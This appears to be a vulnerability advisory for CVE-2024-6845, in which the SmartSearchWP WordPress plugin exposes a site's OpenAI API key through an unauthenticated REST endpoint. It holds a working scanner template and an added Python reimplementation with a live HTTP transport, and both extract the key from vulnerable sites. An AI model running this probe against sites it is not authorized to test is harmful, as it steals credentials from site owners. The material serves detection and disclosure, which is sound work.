CVE-2024-6845: SmartSearchWP < 2.4.6 - OpenAI Key Disclosure

Date: 2025-08-01 | Affected software: SmartSearchWP | PoC: public

Vulnerability description

The plugin does not enforce proper authorization on one of its REST endpoints, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key.

PoC code [public]

id: CVE-2024-6845

info:
  name: SmartSearchWP < 2.4.6 - OpenAI Key Disclosure
  author: s4e-io
  severity: medium
  description: |
    The plugin does not have proper authorization in one of its REST endpoint, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key.
  remediation: Fixed in 2.4.6
  reference:
    - https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6845
  classification:
    epss-score: 0.04282
    epss-percentile: 0.88408
  metadata:
    max-request: 2
    verified: true
    vendor: webdigit
    product: smartsearchwp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/smartsearchwp"
    fofa-query: body="/wp-content/plugins/smartsearchwp"
  tags: cve,cve2024,exposure,wp,wordpress,wp-plugin,smartsearchwp

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/smartsearchwp")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/wdgpt/v1/api-key HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"key": "U2FsdGVkX1+X"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        part: body
        name: api-key
        regex:
          - '"([^"]+)"'
# digest: 4a0a0047304502206a838de13406edce51e0d648cbb1fcb04f50469ea6ebe7e1364e4cc8fda731de022100b223cfa5e1b472e40842cd6a1141106c67e57ce34b16bf0ee2bdc3d9c9dadfd9:922c64590222798bb761d5b6d8e72950
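As an added example (not part of this advisory and not code from the s4e-io template), the Python below reimplements the template's two-step check, fingerprint first and then the POST probe, with the HTTP layer injectable so the logic can be exercised offline against constructed responses. It also tightens the extraction step: the template's regex `"([^"]+)"` returns the first quoted string in the body, which for a body shaped like `{"key":"..."}` is the field name `key` rather than the value, so the example parses the JSON instead and falls back to the regex only for non-JSON bodies. A small helper checks whether a value is base64 beginning with the bytes `Salted__`, the OpenSSL/CryptoJS salted-ciphertext header; the template's own probe value `U2FsdGVkX1+X` decodes to exactly those eight bytes plus one trailing byte. The sample responses are constructed, not captured traffic, and the real endpoint's response shape is not stated on this page; the `urllib` transport is for use only against hosts you are authorized to test.

```python
"""Added example: offline-testable reimplementation of the template's flow (fingerprint,
then probe). Not code from the advisory or from the template author."""
import base64
import binascii
import json
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

PLUGIN_MARKER = "/wp-content/plugins/smartsearchwp"   # fingerprint string from the template
ENDPOINT = "/wp-json/wdgpt/v1/api-key"                # REST endpoint from the template
PROBE_BODY = '{"key": "U2FsdGVkX1+X"}'                # probe body copied verbatim from the template
TEMPLATE_KEY_RE = re.compile(r'"([^"]+)"')            # the template's extractor, kept for comparison

Response = Tuple[int, Dict[str, str], str]             # (status, lower-cased headers, body)
Transport = Callable[[str, str, Optional[str]], Response]


def extract_key(body: str) -> Optional[str]:
    """JSON-aware extractor. The template regex returns the first quoted string, which for
    {"key":"..."} is the field name; here a JSON string or the first string value is returned,
    and the regex is used only when the body is not JSON at all."""
    try:
        data = json.loads(body)
    except ValueError:
        m = TEMPLATE_KEY_RE.search(body)
        return m.group(1) if m else None
    if isinstance(data, str):
        return data
    if isinstance(data, dict):
        for v in data.values():
            if isinstance(v, str):
                return v
    return None


def decodes_to_salted_header(value: str) -> bool:
    """True if value is base64 whose plaintext starts with b'Salted__' (OpenSSL/CryptoJS
    salted-ciphertext header). base64('Salted__') begins 'U2FsdGVkX1', the prefix of the
    template's probe value."""
    padded = value + "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(padded)
    except (binascii.Error, ValueError):
        return False
    return raw.startswith(b"Salted__")


def fingerprint(transport: Transport) -> bool:
    """http(1): the front page must be 200 and reference the plugin directory."""
    status, _, body = transport("GET", "/", None)
    return status == 200 and PLUGIN_MARKER in body


def probe_api_key(transport: Transport) -> Optional[str]:
    """http(2): POST the probe; accept only a 200 JSON response, then extract the value."""
    status, headers, body = transport("POST", ENDPOINT, PROBE_BODY)
    if status != 200 or "application/json" not in headers.get("content-type", ""):
        return None
    return extract_key(body)


def check(transport: Transport) -> Optional[str]:
    """Mirrors the template's flow 'http(1) && http(2)': probe only after a positive fingerprint."""
    if not fingerprint(transport):
        return None
    return probe_api_key(transport)


def urllib_transport(base_url: str) -> Transport:
    """Live transport built on the standard library (authorized targets only)."""
    def send(method: str, path: str, body: Optional[str]) -> Response:
        data = body.encode() if body is not None else None
        headers = {"Content-Type": "application/json"} if data else {}
        req = urllib.request.Request(base_url.rstrip("/") + path, data=data, method=method, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=10) as r:
                return r.status, {k.lower(): v for k, v in r.headers.items()}, r.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            return e.code, {k.lower(): v for k, v in e.headers.items()}, e.read().decode("utf-8", "replace")
    return send


# Constructed sample responses (not captured traffic) standing in for two hypothetical installs.
_FRONT_PAGE = '<script src="/wp-content/plugins/smartsearchwp/js/app.js"></script>'


def fake_vulnerable_site(method: str, path: str, body: Optional[str]) -> Response:
    if method == "GET" and path == "/":
        return 200, {"content-type": "text/html"}, _FRONT_PAGE
    if method == "POST" and path == ENDPOINT:
        return 200, {"content-type": "application/json; charset=UTF-8"}, '{"key":"U2FsdGVkX18SAMPLEONLY00"}'
    return 404, {"content-type": "application/json"}, '{"code":"rest_no_route"}'


def fake_patched_site(method: str, path: str, body: Optional[str]) -> Response:
    if method == "GET" and path == "/":
        return 200, {"content-type": "text/html"}, _FRONT_PAGE
    return 401, {"content-type": "application/json; charset=UTF-8"}, '{"code":"rest_forbidden","data":{"status":401}}'


if __name__ == "__main__":
    print("vulnerable sample:", check(fake_vulnerable_site))
    print("patched sample:", check(fake_patched_site))
```

Against the vulnerable sample the template's regex would have reported `key`, while `extract_key` returns the stored value; against the patched sample the 401 stops the check before any extraction. To run it live, pass `urllib_transport("https://target.example")` to `check`.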
